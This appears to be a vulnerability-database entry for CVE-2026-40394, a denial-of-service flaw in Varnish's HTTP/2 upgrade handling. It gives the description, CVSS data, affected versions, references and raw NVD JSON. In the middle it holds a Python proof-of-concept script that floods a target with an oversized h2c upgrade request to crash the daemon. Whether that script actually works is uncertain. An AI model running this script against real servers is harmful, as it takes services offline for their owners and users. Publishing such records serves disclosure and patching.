CVE-2026-40394

Description

Varnish Cache 9 before 9.0.1 and Varnish Enterprise before 6.0.16r11 allows a "workspace overflow" denial of service (daemon panic) for certain amounts of prefetched data. The setup of an HTTP/2 session starts with a speculative HTTP/1 transport, and upon upgrading to h2 the HTTP/1 request is repurposed as stream zero. During the upgrade, a buffer allocation is made to reserve space to send frames to the client. This allocation would split the original workspace, and depending on the amount of prefetched data, the next fetch could perform a pipelining operation that would run out of workspace.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:varnish-software:varnish_enterprise:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r3:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:* - VULNERABLE

Varnish Cache < 9.0.1

Varnish Enterprise < 6.0.16r11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

def trigger_poc(target_ip, target_port):
    try:
        # Establish TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))

        # Construct a malicious HTTP/1 request requesting upgrade to HTTP/2
        # with large headers to simulate prefetched data causing workspace split
        large_prefetch = "X-Large-Header: " + "A" * 8000 + "\r\n"
        
        payload = (
            "GET / HTTP/1.1\r\n"
            "Host: " + target_ip + "\r\n"
            "Connection: Upgrade, HTTP2-Settings\r\n"
            "Upgrade: h2c\r\n"
            "HTTP2-Settings: AAMAAABkAAQAAP__\r\n"
            + large_prefetch +
            "\r\n"
        )

        s.send(payload.encode())
        
        # Keep connection open or send subsequent data to trigger pipelining overflow
        # depending on server timing
        time.sleep(1)
        
        # Attempt to send more data to stress the workspace
        s.send(b"X-Extra-Data: Trigger\r\n\r\n")
        
        response = s.recv(1024)
        print("Response received, check if server crashed.")
        
    except Exception as e:
        print(f"Error: {e}")
    finally:
        s.close()

# Usage:
# trigger_poc("127.0.0.1", 80)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40394
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40394
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40394/
[4] VulDB https://vuldb.com/cve/CVE-2026-40394
[5] https://docs.varnish-software.com/security/VEV00002/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40394", "sourceIdentifier": "[email protected]", "published": "2026-04-12T20:16:17.857", "lastModified": "2026-04-17T14:35:23.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Varnish Cache 9 before 9.0.1 and Varnish Enterprise before 6.0.16r11 allows a \"workspace overflow\" denial of service (daemon panic) for certain amounts of prefetched data. The setup of an HTTP/2 session starts with a speculative HTTP/1 transport, and upon upgrading to h2 the HTTP/1 request is repurposed as stream zero. During the upgrade, a buffer allocation is made to reserve space to send frames to the client. This allocation would split the original workspace, and depending on the amount of prefetched data, the next fetch could perform a pipelining operation that would run out of workspace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-670"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.15", "matchCriteriaId": "E53A64C0-FC22-40B5-8C3B-6288B44AC3FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "F24D68B5-362E-4797-B6DE-C19A2893186C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r10:*:*:*:*:*:*", "matchCriteriaId": "910BAD01-26E5-4D12-AA23-0BD2D48F229C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "05E529DF-DEE1-4A62-998B-CA312DF888FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "8AB27B34-2951-4755-851C-7C942DAFB6C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r4:*:*:*:*:*:*", "matchCriteriaId": "18A22D42-B038-4E09-92DD-8AFD2F51A340"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r5:*:*:*:*:*:*", "matchCriteriaId": "FE76D616-3AA8-4D9A-9D41-9AE35FE20DBC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r6:*:*:*:*:*:*", "matchCriteriaId": "9C5610CF-1FE4-4DF8-8D49-7C0CCF0359E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r7:*:*:*:*:*:*", "matchCriteriaId": "27B776B2-9C38-45BE-89E4-ECDEEAE538A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r8:*:*:*:*:*:*", "matchCriteriaId": "ED3CA600-C88D-4825-8C36-E052822AF59F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:varnish-software:varnish_enterprise:6.0.16:r9:*:*:*:*:*:*", "matchCriteriaId": "6B1D57B1-9771-4195-9EE3-B26EA776FB6B"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "9868204A-88AD-46D2-BE0B-92FF686B7DE4"}]}]}], "references": [{"url": "https://docs.varnish-software.com/security/VEV00002/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}